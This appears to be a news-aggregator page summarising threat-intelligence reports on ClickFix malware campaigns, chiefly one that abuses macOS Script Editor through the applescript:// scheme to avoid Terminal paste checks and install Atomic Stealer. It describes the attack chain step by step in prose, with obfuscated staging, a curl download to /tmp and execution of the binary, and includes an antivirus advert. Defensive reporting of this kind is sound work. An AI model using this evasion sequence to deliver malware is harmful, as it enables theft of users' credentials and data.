Vetted by NeuralPress's Multi-Agent Verifier for strict factual validity and event relevance. Our compliance engine cross-checks and filters search results to ensure zero false correlations or misleading content.
Attack Vector Evolution
Comparison of execution methods used in ClickFix malware campaigns
Primary Sources
New ClickFix attack bypasses Mac Terminal protections
Jamf Threat Labs recently uncovered a new ClickFix cyberattack going after Mac users. Before, you were at risk when copying and pasting scripts in your Terminal. Today, cybercriminals can trigger a ClickFix attack when you click on a button on a fake website. Let’s dive in to understand how attackers do this and how you can keep your Mac safe. Jamf spots an AMOS stealer campaign significantly changing the ClickFix flow Recently, Jamf Threat Labs discovered a new ClickFix-style macOS attack that was distributing the Atomic Stealer (AMOS). The attack targeted Mac users looking for technical solutions to common macOS issues, like cleaning up their disk. Get reliable protection against ClickFix malware macOS Terminal may not be able to stop these new attacks. But an antivirus like Moonlock will detect and block the malware immediately. try 7 days free The stealer and the fake “Common Mac troubleshooter guide” websites are not new techniques. Both the malware and the fake pages have been used extensively to go after Mac computers in the past. What’s new is the ClickFix flow. It’s shorter, faster, and harder to spot. This ClickFix-style attack “stood out immediately because it ditched the typical Terminal-based execution entry point entirely,” Jamf Threat Labs reported. Jamf Threat Labs shared a screenshot of the ClickFix instructions users saw on the fake site, which is now offline. Note the highlights in red, above the fake Apple logos and the single “Execute” button that triggers the attack. Image: Screenshot, Moonlock. As a quick reminder, ClickFix attacks depend entirely on what you do when you are given a malicious script. They require that you open your Terminal and copy and paste the script there. However, in this campaign, Jamf Threat Labs found that cybercriminals are using other built-in Mac tools to automate this process. That means this attack works with the push of just 2 buttons, has a smoother social engineering flow, and is faster. Jamf Threat Labs explained that the threat campaign used macOS Script Editor, which has a well-documented history as a malware delivery mechanism. The notable aspect, they said, is the use of Script Editor to invoke a URL scheme. Let’s look at what this means and how the attack works. How the new AMOS ClickFix attack works The way this new AMOS campaign works is simple, and what users see when they interact with this threat can be summarized in just a couple of steps. In a way, simpler is more worrying, bec...
The Script Editor Shift: How ClickFix Evades macOS 26.4 Security to ...
Prompt to open Script Editor | Image: Jamf Threat Labs In the ever-evolving game of digital cat-and-mouse, Jamf Threat Labs has identified a clever adaptation of the notorious “ClickFix” attack strategy. Traditionally, these campaigns trick users into pasting malicious commands into the Terminal, but as security friction increases, threat actors are shifting their sights to a different built-in macOS tool: Script Editor. This new campaign effectively sidesteps recent macOS security enhancements while maintaining the same dangerous endgame—infecting systems with the Atomic Stealer infostealer. The hallmark of ClickFix has long been convincing a user to copy and paste a command into the Terminal under the guise of system maintenance. However, Apple introduced a specific security feature in macOS 26.4 that “scans commands pasted into Terminal before they’re executed,” creating a meaningful hurdle for attackers. As Jamf Threat Labs notes, “when one door closes, attackers find another”. This campaign ditches the Terminal-based entry point entirely, instead leveraging the applescript:// URL scheme to automatically launch the macOS Script Editor. The attack begins with a familiar social engineering lure, such as a fake browser update or a “fix” for a non-existent system error. When the victim follows the instructions, the following chain unfolds: URL Scheme Invocation: The attacker uses a URL starting with applescript:// to force the system to open the Script Editor with a pre-loaded command. The First Stage: The initial script is small and obfuscated, typically using “base64 encoding combined with gzip compression to obscure its contents before execution”. The Retrieval: Once executed, this first stage runs a curl command to download a second-stage payload—identified as a Mach-O binary—to the /tmp directory. Final Execution: The script then “removes extended attributes, sets execution permissions and executes” the binary, which Jamf has identified as a recent Atomic Stealer variant. By shifting the execution environment, attackers gain two major advantages. First, they avoid the new “paste-and-scan” protections built into the macOS Terminal. Second, they maintain a “familiar delivery mechanism” while quietly changing how and where the malicious command actually runs. This “small adjustment with a meaningful impact” allows the campaign to remain effective against users who may have been trained to be wary of the Terminal, but see the Script Editor as a more ...
EVALUSION Threat Cluster Uses Fake ClickFix Tools to Push Dual Malware ...
A malware campaign tied to the EVALUSION threat cluster is abusing fake ClickFix utilities to deploy Amatera Stealer or NetSupport RAT. The attackers use staged loaders and Microsoft-themed deception to harvest credentials, seize remote access, and evade detection through familiar-looking executables.
ClickFix Campaign on macOS Leverages Script Editor Over Terminal
A new ClickFix campaign targets macOS by abusing Script Editor instead of Terminal, using social engineering to deliver Atomic Stealer malware and steal sensitive data.
